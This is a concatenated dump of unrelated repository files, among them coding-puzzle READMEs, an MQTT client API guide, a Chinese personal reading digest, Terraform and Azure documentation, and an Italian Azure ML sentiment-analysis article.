] | 1 | 2019-07-24T18:43:53.000Z | 2019-07-24T18:43:53.000Z | Heap/791.Merge Number/README.md | Zhenye-Na/LxxxCode | afd79d790d0a7495d75e6650f80adaa99bd0ff07 | [
"MIT"
] | 10 | 2019-07-01T04:03:04.000Z | 2022-03-09T03:57:37.000Z | # 791. Merge Number
**Description**
Given `n` numbers, now we need to merge `n` numbers into one number. And each time we can only select and merge two numbers `a`, `b`. Each merger needs to consume `a + b` energy. Output the *minimum energy* consumed by merging `n` numbers.
```
2 <= n <= 50000, the combined number will not exceed the int range
```
**Example**
Example 1:
```
Input: [1,2,3,4]
Output: 19
Explanation:
Merge 1,2, which consumes 3 energy, and the rest is [3,4,3].
Then merge 3,3, which consumes 6 energy, and the rest is [6,4].
Then merge the last two numbers, which consumes 10 energy, and a total of 19 energy was consumed.
```
Example 2:
```
Input: [2,8,4,1]
Output: 25
Explanation:
Merge 1,2, which consumes 3 energy, and the rest is [8,4,3].
Merge 3,4, which consumes 7 energy, and the rest is [7,8].
Merge the last two numbers, which consumes 15 energy,
and a total of 25 energy was consumed.
```
**Heap**
Priority Queue
```python
from heapq import heappush, heappop
class Solution:
"""
@param numbers: the numbers
@return: the minimum cost
"""
def mergeNumber(self, numbers):
# Write your code here
if not numbers or len(numbers) == 0:
return 0
heap = []
for num in numbers:
heappush(heap, num)
ans = 0
while len(heap) >= 2:
num1 = heappop(heap)
num2 = heappop(heap)
ans += num1 + num2
heappush(heap, num1 + num2)
return ans
```
| 22.217391 | 239 | 0.6197 | eng_Latn | 0.997844 |
9a57309e8af69cc2cfb044a895fbd49848247933 | 5,374 | md | Markdown | src/doc/ClientAPI.md | TakuKitamura/verimqtt-c | 30109f66df126e5860f2329ce2ad3cfb7f12d9da | [
"MIT"
] | 42 | 2020-03-15T22:07:04.000Z | 2022-03-18T18:49:35.000Z | src/doc/ClientAPI.md | TakuKitamura/verimqtt-c | 30109f66df126e5860f2329ce2ad3cfb7f12d9da | [
"MIT"
] | 6 | 2020-06-04T17:07:29.000Z | 2021-02-17T14:49:05.000Z | src/doc/ClientAPI.md | TakuKitamura/verimqtt-c | 30109f66df126e5860f2329ce2ad3cfb7f12d9da | [
"MIT"
] | 9 | 2020-08-07T11:49:08.000Z | 2022-02-20T14:15:35.000Z | # Using the client
You need to include the file [MQTTClient.hpp](https://github.com/X-Ryl669/eMQTT5/blob/master/lib/include/Network/Clients/MQTT.hpp).
On top of this file, you need to specify your options by changing the various macro value (see documentation on each macro).
Typically, you'll find these macros:
1. **MQTTClientOnlyImplementation**: You are unlikely to change this macro
2. **MQTTUseAuth**: Whether in your protocol you are using the AUTH control packet
3. **MQTTDumpCommunication**: Useful for debugging, this dumps each packet sent and received, you'll need to turn this off for production
4. **MQTTAvoidValidation**: If enabled, all validation code is removed. You should only use this if you master the broker used in your installation and know it'll not send malformed packet
5. **MQTTOnlyBSDSocket**: Usually set to 1 for using plain old sockets. If set to 0, then more efficient, but larger ClassPath's network code is used
6. **MQTTUseTLS**: If enabled, you can connect to TLS based MQTT brokers. This add some overhead in binary code size (typically 5% more) and requires MbedTLS
The client is located in `Network::Client::MQTTv5` class.
The main methods are:
1. **connectTo**: Establish a connection to the given MQTT server
2. **auth**: Authenticate with the MQTT server
2. **subscribe** (2): Subscribe to one or more topic on the MQTT server
3. **publish**: Publish a packet on a MQTT server
4. **disconnect**: Disconnect from a MQTT server cleanly
5. **eventLoop**: The method that needs to be called regularly (from a thread ?) for processing messages
Upon construction, a buffer for receiving packets (with a limited and specifiable size) is allocated on the heap.
In case your platform does not support heap allocation, this can easily be changed to a BSS/static based allocation in `Network::Client::MQTTv5::Impl` constructor.
# Specificities of MQTT v5.0
MQTT v5.0 introduced new features compared to MQTT v3.1.1: mainly Properties and Authentication
## Authentication
Authentication in MQTT v3.1.1 was mainly either client identifier based or username/password based, a bit like HTTP/1.0 did.
In MQTT v5.0, it's now possible to also have multiple step authentication with per-broker/per-client specific protocol.
Authentication requires a new control packet type, and, as such, you can use **auth** method of the client to build this packet.
The usual process with authentication is the following:
1. Client => `CONNECT with some authentication properties attached` => Server
2. Server => `AUTH with some challenge/method/data` => Client
3. Client => `AUTH with some answer/data`=> Server
4. Server => `CONNACK` => Client
For the first step, you'll need to append as many properties as required (see the Properties section below for how to do that) in your first call to **connectTo**.
When the server answers (in step 2), your callback instance will be called with the authentication method and data already parsed for you.
You'll then use the **auth** method in step 3 to complete the challenge, the method either returns with a success (step 4) or a failure.
Please notice that none of the above is required for usual client identifier or username / password connection.
## Using Properties with the client
Since this library is oriented for embedded usage, a great care was taken for avoiding heap usage and minimizing code size.
### Packet in destination of the broker
In order to acheive theses goals, the `Properties` class is a chained list where each node stores a flag telling if it was allocated on the stack (default) or on the heap.
When the chained list is destructed, each node will either suicide(delete itself) or just chain the destruction request to the next node.
Parsing the chained list is done recursively, but this shouldn't be an issue since the number of possible properties for each packet is small.
Appending properties is done like this:
```
Property<uint32> maxProp(PacketSizeMax, recvBufferSize);
if (!packet.props.getProperty(PacketSizeMax))
packet.props.append(&maxProp); // That's possible with a stack property as long as the lifetime of the object outlive the packet
```
### Receiving packets from the broker
When receiving a packet, the code never does any copy, so serialization from Properties is done directly from the received buffer.
In that case, you'll be dealing with `PropertiesView` class and more specifically with its `bool getProperty(VisitorVariant & visitor, PropertyType & type, uint32 & offset) const` method.
Typically, you'll create a `VisitorVariant` instance, a `PropertyType` instance and an `offset` counter then call `getProperty`.
This method will fill each instance with the appropriate visitor and type. `offset` is increased to the next property position in the observed (received) buffer.
It's then up to you to check which property you are interested in, and extract the visited property value like this:
```
PropertyType type = BadProperty;
uint32 offset = 0;
VisitorVariant visitor;
while (packet.props.getProperty(visitor, type, offset))
{
switch (type)
{
case PacketSizeMax:
{
auto pod = visitor.as< LittleEndianPODVisitor<uint32> >();
maxPacketSize = pod->getValue();
break;
}
[...]
```
| 54.836735 | 188 | 0.752698 | eng_Latn | 0.998733 |
9a573721a89ed592320a3c2be3c82dd2ece813c4 | 242 | md | Markdown | _posts/1964-04-21-irving-mcnayr-rejects-the-governor's.md | MiamiMaritime/miamimaritime.github.io | d087ae8c104ca00d78813b5a974c154dfd9f3630 | [
"MIT"
] | null | null | null | _posts/1964-04-21-irving-mcnayr-rejects-the-governor's.md | MiamiMaritime/miamimaritime.github.io | d087ae8c104ca00d78813b5a974c154dfd9f3630 | [
"MIT"
] | null | null | null | _posts/1964-04-21-irving-mcnayr-rejects-the-governor's.md | MiamiMaritime/miamimaritime.github.io | d087ae8c104ca00d78813b5a974c154dfd9f3630 | [
"MIT"
] | null | null | null | ---
title: Irving McNayr rejects the Governor's
tags:
- Apr 1964
---
Irving McNayr rejects the Governor's Islandia development plan.
Newspapers: **Miami Morning News or The Miami Herald**
Page: **1**, Section: **B**
| 20.166667 | 65 | 0.644628 | eng_Latn | 0.79751 |
9a576c0bbae8e298fb8c245c52e72c749fdc61f9 | 657 | md | Markdown | 2020_June_Leetcode_30_days_challenge/Week_3_Surrounded Regions/Week_3_Surrounded Regions_description.md | coderMaruf/leetcode-1 | 20ffe26e43999e44c8acf9800acb371a49bb5853 | [
"MIT"
] | 32 | 2020-01-05T13:37:16.000Z | 2022-03-26T07:27:09.000Z | 2020_June_Leetcode_30_days_challenge/Week_3_Surrounded Regions/Week_3_Surrounded Regions_description.md | coderMaruf/leetcode-1 | 20ffe26e43999e44c8acf9800acb371a49bb5853 | [
"MIT"
] | null | null | null | 2020_June_Leetcode_30_days_challenge/Week_3_Surrounded Regions/Week_3_Surrounded Regions_description.md | coderMaruf/leetcode-1 | 20ffe26e43999e44c8acf9800acb371a49bb5853 | [
"MIT"
] | 8 | 2020-06-18T16:17:27.000Z | 2022-03-15T23:58:18.000Z | '''
Description:
Given a 2D board containing 'X' and 'O' (the letter O), capture all regions surrounded by 'X'.
A region is captured by flipping all 'O's into 'X's in that surrounded region.
Example:
X X X X
X O O X
X X O X
X O X X
After running your function, the board should be:
X X X X
X X X X
X X X X
X O X X
Explanation:
Surrounded regions shouldn’t be on the border, which means that any 'O' on the border of the board are not flipped to 'X'. Any 'O' that is not on the border and it is not connected to an 'O' on the border will be flipped to 'X'. Two cells are connected if they are adjacent cells connected horizontally or vertically.
''' | 25.269231 | 317 | 0.718417 | eng_Latn | 0.999982 |
9a57d303c0f031575e74b58eecbf75c3f91df0bf | 2,394 | md | Markdown | _posts/2019-10-07-weekly digest.md | daoism-kk/daoism-kk.github.io | ce058fcd6692c39a9d90637ea88eb9cfcb929c19 | [
"MIT"
] | null | null | null | _posts/2019-10-07-weekly digest.md | daoism-kk/daoism-kk.github.io | ce058fcd6692c39a9d90637ea88eb9cfcb929c19 | [
"MIT"
] | null | null | null | _posts/2019-10-07-weekly digest.md | daoism-kk/daoism-kk.github.io | ce058fcd6692c39a9d90637ea88eb9cfcb929c19 | [
"MIT"
] | null | null | null | ---
layout: post
title: 2019/10/07 weekly digest
---
这个国庆节一如即往的,没有出去蹭人流,在家里呆着休息和学习。简单来说收获就是看了几本书,看了几个视频,下面简单回顾一下。
## 读书记录
### 1. Alpha brain
这本书是张磊推荐看的,主要是讲认知科学在投资和经营中的使用,可以说是一份大脑使用手册。目前为止大概看了三分之一,里面很多概念是以往就知道的,比如芒格的书和著名的think,fast and slow里面看到过类似的知识。但在作者的组织之下,感觉非常的有实用性,这可能和作者的经历有关(对冲基金投资经理出身),下面是我记录的笔记:
* **在比赛或者游戏中,减少犯错是取得高胜率的关键,只需要通过微小的改进(marginal improve),就可以产生巨大的变化**。作者以一名网球运动员为例(*好多书都喜欢用网球举例,因为网球是一个非常数据化的运动,所有运动员的每场比赛数据都有*),在他职业生涯的几个阶段,从庸手到世界顶级球员,其实他的接球成功率(可能是这个)仅仅从49%提升到了53%,但这个反应在比赛胜率和获得的财务回报上,产生了巨大的变化。
* 在市场上,你的胜利或者收益来自两部分,运气和技巧。所谓技巧就是抓住其他人的错误,转化为自己的优势。如果所有玩家都不犯错,那就会变成一个纯粹比运气的游戏了。这个有点像德州的GTO打发,如果一局牌所有人都按照最优策略来打,那所谓的技巧和策略就不会有额外的收益(偷鸡或者价值),这个时候是一个均衡状态。在投资中,就是市场并不总是有效的,会给出错误的定价,有能力的投资者可以从中获得超额收益,就是所谓的alpha
* 关于决策,有两种研究方向,一是应该如何做决策(如何做一个rational decion),另外一个是实际我们如何做决策的(人类会犯什么样的错误)。作者提出第三种理论,帮助决策者拉近理论和实际的距离(减少mistake)。
* 人的大脑有一个倾向,就是首先会寻找Metal shortcuts,不会让理性的部分直接处理各类刺激。一般会经历autopilot-cognitive ease-Stress-Cognitive strain几个阶段。因此,我们需要锻炼自己理性决策的能力(卡尼曼所谓的“系统2”)
* 关于如何理性做决策,最重要的是第一步定义问题,第二部分析现状,然后自然就会有act可以去选择。
## 有意思的video
### 1. Dan Lok的油管视频
从王川(公号:investguru)的文章里发现这个小哥的信息,就去学习了一下。Dan是一个加拿大华人,没上过大学,从copywriter开始一路创业,主要的一个理论叫high-ticket sale。主张做高毛利的生意,衍生出来一套销售体系,几个点挺有意思的,后面可以和团队分享。
* 客户分4类,一类叫cheap,都不管你卖啥就看价格;一类叫difficult,就是很难搞,目的就是让你不开心;一类叫sophisticated,就是属于比较懂的客户,需要专业服务;一类叫affluent,就是比较有钱的,感觉对了就买。销售需要把精力放在后两类客户上
* 油管上有他数百个关于销售/赚钱/打鸡血的视频,里面有很多技巧确实比较有价值,从视频里也能看出他是一个很棒的speaker和marketer。不过这个思路不是做大生意的思路,更多的是几个人搞一票赚比较多钱的路子,他自己也说,prefer small business(并不是说这不好)
### 2. 纪录片
#### 2.1 周浩导演的《差馆》
B站有资源,拍的是11年左右春节广州火车站发生的各类case,周浩导演的几部作品都非常有冲击力(中国市长,书记这两部记录了两名政府官员的故事)。看了这部片子,里面感觉最讲理的人居然是刑满释放的人,真的非常让人感概。
**这是一个撕裂的中国**,3亿收入达到发达国家的中国+11亿低收入发展中国家的中国。虽然70年发展我们创造了巨大的经济奇迹,但这还远远不够,希望100周年的时候,能够看到更多的变化。
P.S 这让我重新认识了拼多多的价值,是不是应该去买一点呢?
#### 2.2 Inside Bill‘s Brain
奈飞出品,必属精品。
一共3小集,使用了蒙太奇的剪辑手法(看的有些头疼),混合的讲述了gates的成长经历,建立微软的过程,以及成立基金会后做的事情。从中可以了解到gates是如何思考和工作的。
* 非常热爱思考和阅读,随时随地带着一袋子书。他从90年代起就会有一个类似思考和阅读周的安排,一个人到度假村呆一周,读书 思考和写作(感觉我的我假期就是在这样过哈哈)。当然天才的大脑确实厉害,读书速度和质量都远超一般人。
* 用围棋术语说,gates是一个胜负师,非常重视结果。但他同时也享受挑战的过程。
* 关于Gates和梅琳达/母亲以及Paul Allen/kent的关系,非常真实。Gates作为一个非常理性的人,并不忽视自己的情感,这点很棒,而且能够用理性来平衡,这让我羡慕
* 印象很深的一幕,导演问了一个类似成立基金会做这些事情有啥意义的问题,Gates回答“Optimization”,让世界的资源得到有效的利用。作为一个理性优化派,听了非常感动,这是我一直追求的境界。
最后,众所周知,他和巴菲特关系很好,因为这部片子可以和巴菲特的纪录片一起食用,效果更佳
## 西湖
假期的最后,夜游西湖,意想不到的游人还是很多。
不知道为什么,仅仅在湖边呆上一会,就会感觉自己的心情和能量都恢复了好多。决定可以把这个变成常规操作,晚上下班去逛逛。
这真的是杭州的魅力吧,“未能抛得杭州去,一半勾留是此湖”
| 44.333333 | 210 | 0.851713 | zho_Hans | 0.451053 |
9a5812d15fa4c57821025c4392223635a95320b5 | 2,020 | md | Markdown | translations/zh-CN/content/actions/using-github-hosted-runners/adding-ae-hosted-runners.md | nyanthanya/Cuma_Info | d519c49504fc3818c1294f14e63ee944d2f4bd89 | [
"CC-BY-4.0",
"MIT"
] | 17 | 2021-01-05T16:29:05.000Z | 2022-02-26T09:08:44.000Z | translations/zh-CN/content/actions/using-github-hosted-runners/adding-ae-hosted-runners.md | nyanthanya/Cuma_Info | d519c49504fc3818c1294f14e63ee944d2f4bd89 | [
"CC-BY-4.0",
"MIT"
] | 222 | 2021-04-08T20:13:34.000Z | 2022-03-18T22:37:27.000Z | translations/zh-CN/content/actions/using-github-hosted-runners/adding-ae-hosted-runners.md | nyanthanya/Cuma_Info | d519c49504fc3818c1294f14e63ee944d2f4bd89 | [
"CC-BY-4.0",
"MIT"
] | 3 | 2021-08-31T03:18:06.000Z | 2021-10-30T17:49:09.000Z | ---
title: 添加 AE 托管的运行器
intro: '您可以将 {% data variables.actions.hosted_runner %} 添加到组织或企业。'
versions:
github-ae: '*'
---
{% data reusables.actions.ae-beta %}
{% note %}
**注意:**要添加 {% data variables.actions.hosted_runner %} 到 {% data variables.product.prodname_ghe_managed %},您需要联系 {% data variables.product.prodname_dotcom %} 支持。 本文介绍支持部门完成此过程所需的信息。
{% endnote %}
{% data variables.actions.hosted_runner %} 可以使用基础 Azure 操作系统映像,您可以创建自己的自定义映像。
### 从基础 Azure 映像添加 {% data variables.actions.hosted_runner %}
您可以添加使用基础 Azure 操作系统映像的 {% data variables.actions.hosted_runner %}。 要将 {% data variables.actions.hosted_runner %} 添加到您的组织或企业,请联系 {% data variables.product.prodname_dotcom %} 支持并备好以下信息:
- 所需的操作系统:可用选项请参阅[“软件规格](/actions/using-github-hosted-runners/about-ae-hosted-runners#software-specifications)”。
- 为每个 {% data variables.actions.hosted_runner %} 池选择一个名称。 这些名称被创建为标签,允许您将工作流程路由到这些运行器。 更多信息请参阅[“在工作流程中使用 {% data variables.actions.hosted_runner %}](/actions/using-github-hosted-runners/using-ae-hosted-runners-in-a-workflow)”。
- 将 {% data variables.actions.hosted_runner %} 添加到何处:确定将接收该运行器的组织和企业的名称。
### 使用自定义映像添加 {% data variables.actions.hosted_runner %}
要创建自定义操作系统映像,请参阅[“创建自定义映像”](/actions/using-github-hosted-runners/creating-custom-images)的步骤。
使用上述步骤创建自定义映像后,请联系 {% data variables.product.prodname_dotcom %} 支持并提供以下详细信息:
- 在遵循自定义映像创建步骤时生成的 SAS URI。
- 映像使用的操作系统类型:可以是 Linux 或 Windows。
- 映像名称:
- 版本.
- 新池的 VM SKU。
- 为每个 {% data variables.actions.hosted_runner %} 池选择一个名称。 这些名称被创建为标签,允许您将工作流程路由到这些运行器。 更多信息请参阅[“在工作流程中使用 {% data variables.actions.hosted_runner %}](/actions/using-github-hosted-runners/using-ae-hosted-runners-in-a-workflow)”。
- 将 {% data variables.actions.hosted_runner %} 添加到何处:确定将接收该运行器的组织和企业的名称。
### 查看您的 {% data variables.actions.hosted_runner %}
在 {% data variables.product.prodname_dotcom %} 支持部门添加您的运行器后,您将能够在您的运行器列表中找到它们:
{% data reusables.github-actions.hosted-runner-navigate-to-repo-org-enterprise %}
{% data reusables.github-actions.hosted-runner-list %}
| 44.888889 | 228 | 0.755941 | yue_Hant | 0.414207 |
9a58229e7db1eb95e88d93b880db6c61bae7c99a | 2,622 | markdown | Markdown | providers/terraform-provider-aws/website/docs/r/config_remediation_configuration.html.markdown | h0tbird/clusterawsadm | 20b19cffa12b40b66f07c33a5e6322ced9dab3dc | [
"MIT"
] | null | null | null | providers/terraform-provider-aws/website/docs/r/config_remediation_configuration.html.markdown | h0tbird/clusterawsadm | 20b19cffa12b40b66f07c33a5e6322ced9dab3dc | [
"MIT"
] | null | null | null | providers/terraform-provider-aws/website/docs/r/config_remediation_configuration.html.markdown | h0tbird/clusterawsadm | 20b19cffa12b40b66f07c33a5e6322ced9dab3dc | [
"MIT"
] | null | null | null | ---
subcategory: "Config"
layout: "aws"
page_title: "AWS: aws_config_remediation_configuration"
description: |-
Provides an AWS Config Remediation Configuration.
---
# Resource: aws_config_remediation_configuration
Provides an AWS Config Remediation Configuration.
~> **Note:** Config Remediation Configuration requires an existing [Config Rule](/docs/providers/aws/r/config_config_rule.html) to be present.
## Example Usage
AWS managed rules can be used by setting the source owner to `AWS` and the source identifier to the name of the managed rule. More information about AWS managed rules can be found in the [AWS Config Developer Guide](https://docs.aws.amazon.com/config/latest/developerguide/evaluate-config_use-managed-rules.html).
```hcl
resource "aws_config_config_rule" "this" {
name = "example"
source {
owner = "AWS"
source_identifier = "S3_BUCKET_VERSIONING_ENABLED"
}
}
resource "aws_config_remediation_configuration" "this" {
config_rule_name = aws_config_config_rule.this.name
resource_type = "AWS::S3::Bucket"
target_type = "SSM_DOCUMENT"
target_id = "AWS-EnableS3BucketEncryption"
target_version = "1"
parameter {
name = "AutomationAssumeRole"
static_value = "arn:aws:iam::875924563244:role/security_config"
}
parameter {
name = "BucketName"
resource_value = "RESOURCE_ID"
}
parameter {
name = "SSEAlgorithm"
static_value = "AES256"
}
}
```
## Argument Reference
The following arguments are supported:
* `config_rule_name` - (Required) The name of the AWS Config rule
* `resource_type` - (Optional) The type of a resource
* `target_id` - (Required) Target ID is the name of the public document
* `target_type` - (Required) The type of the target. Target executes remediation. For example, SSM document
* `target_version` - (Optional) Version of the target. For example, version of the SSM document
* `parameter` - (Optional) Can be specified multiple times for each
parameter. Each parameter block supports fields documented below.
The `parameter` block supports:
The value is either a dynamic (resource) value or a static value.
You must select either a dynamic value or a static value.
* `name` - (Required) The name of the attribute.
* `resource_value` - (Optional) The value is dynamic and changes at run-time.
* `static_value` - (Optional) The value is static and does not change at run-time.
## Import
Remediation Configurations can be imported using the name config_rule_name, e.g.
```
$ terraform import aws_config_remediation_configuration.this example
```
| 33.189873 | 313 | 0.736842 | eng_Latn | 0.911937 |
9a590960c93bfd0ccaaf7ef6579e9fa2404fc0b3 | 13,106 | md | Markdown | articles/machine-learning/team-data-science-process/predict-twitter-sentiment-amltextpackage.md | andreatosato/azure-docs.it-it | 7023e6b19af61da4bb4cdad6e4453baaa94f76c3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/machine-learning/team-data-science-process/predict-twitter-sentiment-amltextpackage.md | andreatosato/azure-docs.it-it | 7023e6b19af61da4bb4cdad6e4453baaa94f76c3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/machine-learning/team-data-science-process/predict-twitter-sentiment-amltextpackage.md | andreatosato/azure-docs.it-it | 7023e6b19af61da4bb4cdad6e4453baaa94f76c3 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Classificazione del sentiment di Twitter con il pacchetto di Azure Machine Learning (AML) per l'analisi del testo (AMLPTA) e il processo di data science per i team (TDSP) | Microsoft Docs
description: Viene descritto l'uso del processo di data science per i team (TDSP) e del pacchetto di Azure Machine Learning (AML) per l'analisi del testo (AMLPTA) per la classificazione del sentiment
services: machine-learning, team-data-science-process
documentationcenter: ''
author: deguhath
manager: deguhath
editor: cgronlun
ms.assetid: b8fbef77-3e80-4911-8e84-23dbf42c9bee
ms.service: machine-learning
ms.workload: data-services
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: article
ms.date: 06/20/2018
ms.author: deguhath
ms.openlocfilehash: 9e5018bc4c7b90897f7f8c91169410284217b172
ms.sourcegitcommit: e2ea404126bdd990570b4417794d63367a417856
ms.translationtype: HT
ms.contentlocale: it-IT
ms.lasthandoff: 09/14/2018
ms.locfileid: "45577008"
---
# <a name="twitter-sentiment-classification-with-azure-machine-learning-aml-package-for-text-analytics-amlpta-and-team-data-science-process-tdsp"></a>Classificazione del sentiment di Twitter con il pacchetto di Azure Machine Learning (AML) per l'analisi del testo (AMLPTA) e il processo di data science per i team (TDSP)
## <a name="introduction"></a>Introduzione
La standardizzazione della struttura e della documentazione dei progetti di data science, che è associata a un [ciclo di vita di data science](https://github.com/Azure/Microsoft-TDSP/blob/master/Docs/lifecycle-detail.md) prestabilito, è fondamentale per favorire una collaborazione efficace nei team di data science.
In passato è stato reso disponibile un [repository GitHub per la struttura e i modelli del progetto di TDSP](https://github.com/Azure/Azure-TDSP-ProjectTemplate). Oggi è possibile creare progetti di Azure Machine Learning di cui creare istanze con la [struttura e i modelli di documentazione di TDSP per Azure Machine Learning](https://github.com/amlsamples/tdsp). Le istruzioni su come usare la struttura e i modelli di TDSP in Azure Machine Learning sono disponibili [qui](https://docs.microsoft.com/azure/machine-learning/preview/how-to-use-tdsp-in-azure-ml).
In questo esempio viene illustrato l'uso del pacchetto di Azure Machine Learning per l'analisi del testo e del processo di data science per i team per sviluppare e distribuire modelli predittivi per la classificazione del sentiment di Twitter.
## <a name="use-case"></a>Caso d'uso
### <a name="twitter-sentiment-polarity-sample"></a>Esempio di polarità del sentiment in Twitter
Questo articolo usa un esempio per mostrare come creare un'istanza di un progetto di Machine Learning ed eseguire il progetto. L'esempio usa la struttura e i modelli di TDSP in Azure Machine Learning Workbench. L'esempio completo è disponibile in questa procedura dettagliata. L'attività di modellazione prevede la polarità del sentiment (positivo o negativo) usando il testo dei Tweet. Questo articolo presenta le attività di modellazione dei dati descritte nella procedura dettagliata. La procedura dettagliata include le attività seguenti:
1. Esplorazione, training e distribuzione dei dati di un modello di apprendimento automatico che risolve il problema di previsione descritto nella panoramica del caso d'uso. Per queste attività vengono usati i dati del sentiment di Twitter.
2. Esecuzione del progetto tramite il modello di TDSP da Azure Machine Learning per questo progetto. Per l'esecuzione del progetto e la creazione di report, si userà il ciclo di vita di TDSP.
3. Operazionalizzazione della soluzione direttamente da Azure Machine Learning nel servizio contenitore di Azure.
Il progetto evidenzia l'uso del pacchetto di Azure Machine Learning per l'analisi del testo.
## <a name="link-to-github-repository"></a>Collegamento al repository GitHub
Il collegamento al repository GitHub è disponibile [qui](https://github.com/Azure/MachineLearningSamples-AMLTextPackage-TwitterSentimentPrediction).
### <a name="purpose"></a>Scopo
Lo scopo principale di questo esempio è mostrare come creare un'istanza di un progetto di apprendimento automatico ed eseguire il progetto usando la struttura e i modelli del processo di data science per i team (TDSP) in Azure Machine Learning Workbench. A tale scopo, vengono usati i [dati del sentiment di Twitter](http://cs.stanford.edu/people/alecmgo/trainingandtestdata.zip). L'attività di modellazione consiste nel prevedere la polarità del sentiment (positivo o negativo) usando il testo dei tweet.
### <a name="scope"></a>Scope
- Esplorazione, training e distribuzione dei dati di un modello di apprendimento automatico che risolve il problema di stima descritto nella panoramica del caso d'uso.
- Esecuzione del progetto in Azure Machine Learning usando il modello di Team Data Science Process (TDSP) per questo progetto. Per l'esecuzione del progetto e la creazione del report, si userà il ciclo di vita di TDSP.
- Operazionalizzazione della soluzione direttamente da Azure Machine Learning in servizi contenitore di Azure.
Il progetto evidenzia diverse funzionalità di Azure Machine Learning, tra cui la creazione di istanze e l'uso della struttura del processo di data science per i team (TDSP), l'esecuzione di codice in Azure Machine Learning Workbench e la semplice operazionalizzazione in servizi contenitore di Azure con Docker e Kubernetes.
## <a name="team-data-science-process-tds"></a>Processo di data science per i team (TDSP)
Per eseguire questo esempio, vengono usati la struttura di progetto e i modelli di documentazione del processo di data science per i team (TDSP). Viene seguito il [ciclo di vita del processo di data science per i team](https://docs.microsoft.com/azure/machine-learning/team-data-science-process/lifecycle). Il progetto viene creato in base alle istruzioni fornite [qui](https://github.com/amlsamples/tdsp/blob/master/docs/how-to-use-tdsp-in-azure-ml.md).
<img src="./media/predict-twitter-sentiment-amltextpackage/tdsp-lifecycle2.png" alt="tdsp-lifecycle" width="800" height="600">
## <a name="use-case-overview"></a>Panoramica del caso d'uso
L'attività consiste nel prevedere la polarità binaria del sentiment di ogni tweet usando funzionalità di rappresentazione distribuita delle parole estratte dal testo di Twitter. Per informazioni dettagliate, vedere questo [repository](https://github.com/Azure/MachineLearningSamples-AMLTextPackage-TwitterSentimentPrediction).
### <a name="data-acquisition-and-understandinghttpsgithubcomazuremachinelearningsamples-amltextpackage-twittersentimentpredictiontreemastercode01dataacquisitionandunderstanding"></a>[Acquisizione e comprensione dei dati](https://github.com/Azure/MachineLearningSamples-AMLTextPackage-TwitterSentimentPrediction/tree/master/code/01_data_acquisition_and_understanding)
Il primo passaggio dell'esempio consiste nello scaricare il set di dati sentiment140 e dividerlo in set di dati di training e di test. Il set di dati sentiment140 include il contenuto effettivo del tweet (con le emoticon rimosse) insieme alla polarità di ogni tweet (negativo = 0, positivo = 4), con i tweet neutri rimossi. I dati di training risultanti contengono 1,3 milioni di righe e i dati di test 320.000 righe.
### <a name="modelinghttpsgithubcomazuremachinelearningsamples-amltextpackage-twittersentimentpredictiontreemastercode02modeling"></a>[Modellazione](https://github.com/Azure/MachineLearningSamples-AMLTextPackage-TwitterSentimentPrediction/tree/master/code/02_modeling)
Questa parte dell'esempio viene ulteriormente divisa in tre parti secondarie:
- **Progettazione delle funzionalità**: corrisponde alla generazione delle funzionalità usando un algoritmo di rappresentazione distribuita delle parole diverso, ovvero Word2Vec.
- **Creazione del modello**: riguarda il training di diversi modelli, come quelli di _regressione logistica_ e _aumento priorità a gradienti_ per prevedere il sentiment del testo di input.
- **Valutazione del modello**: si applica al modello sottoposto a training con i dati di test.
#### <a name="feature-engineering"></a>Progettazione delle funzioni
Viene usato <b>Word2Vec</b> per generare rappresentazioni distribuite delle parole. Prima di tutto si usa l'algoritmo Word2Vec in modalità Skip-gram, come illustrato nel documento[Mikolov, Tomas, et al. Distributed representations of words and phrases and their compositionality. Advances in neural information processing systems. 2013.](https://arxiv.org/abs/1310.4546) per generare rappresentazioni distribuite delle parole.
Skip-gram è una rete neurale superficiale che accetta come input la parola di destinazione codificata come vettore one-hot e la usa per prevedere le parole vicine. Se V è la dimensione del vocabolario, la dimensione del livello di output è __C*V__, dove C è la dimensione della finestra di contesto. L'architettura basata su Skip-gram è illustrata nella figura seguente.
<table class="image" align="center">
<caption align="bottom">Modello Skip-gram</caption>
<tr><td><img src="https://s3-ap-south-1.amazonaws.com/av-blog-media/wp-content/uploads/2017/06/05000515/Capture2-276x300.png" alt="Skip-gram model"/></td></tr>
</table>
I dettagli dell'algoritmo Word2Vec e del modello Skip-gram esulano dall'ambito di questo esempio e i lettori interessati possono vedere i collegamenti seguenti per altri dettagli. [Esempi tensorflow](https://github.com/tensorflow/tensorflow/blob/master/tensorflow/examples/tutorials/word2vec/word2vec_basic.py) di riferimento con codice 02_A_Word2Vec.py
* [Vector Representations of Words](https://www.tensorflow.org/tutorials/word2vec) (Rappresentazioni vettoriali di parole)
* [How exactly does word2vec work?](http://www.1-4-5.net/~dmm/ml/how_does_word2vec_work.pdf) (Come funziona esattamente Word2Vec?)
* [Notes on Noise Contrastive Estimation and Negative Sampling](http://demo.clab.cs.cmu.edu/cdyer/nce_notes.pdf) (Note sulla stima contrastiva del rumore e sul campionamento negativo)
Al termine del processo di training, vengono generati due file di rappresentazione distribuita in formato TSV per la fase di modellazione.
#### <a name="model-training"></a>Training dei modelli
Dopo la generazione dei vettori delle parole tramite l'algoritmo Word2vec o SSWE, il passaggio successivo consiste nell'eseguire il training dei modelli di classificazione per prevedere la polarità effettiva del sentiment. Vengono applicati i due tipi di funzionalità, Word2Vec e SSWE, in due modelli, ovvero regressione logistica e reti neurali convoluzionali (CNN).
#### <a name="model-evaluation"></a>Valutazione del modello.
Viene fornito il codice per caricare e valutare più modelli sottoposti a training con un set di dati di test.
### <a name="deploymenthttpsgithubcomazuremachinelearningsamples-amltextpackage-twittersentimentpredictiontreemastercode03deployment"></a>[Distribuzione](https://github.com/Azure/MachineLearningSamples-AMLTextPackage-TwitterSentimentPrediction/tree/master/code/03_deployment)
In questa parte vengono forniti collegamenti alle istruzioni per l'operazionalizzazione di un modello di stima del sentiment prima del training in un servizio Web in un cluster nel servizio contenitore di Azure (AKS). L'ambiente di operazionalizzazione effettua il provisioning di Docker e Kubernetes nel cluster per gestire la distribuzione del servizio Web. Altre informazioni sul processo di operazionalizzazione sono disponibili [qui](https://docs.microsoft.com/azure/machine-learning/preview/model-management-service-deploy).
## <a name="conclusion"></a>Conclusioni
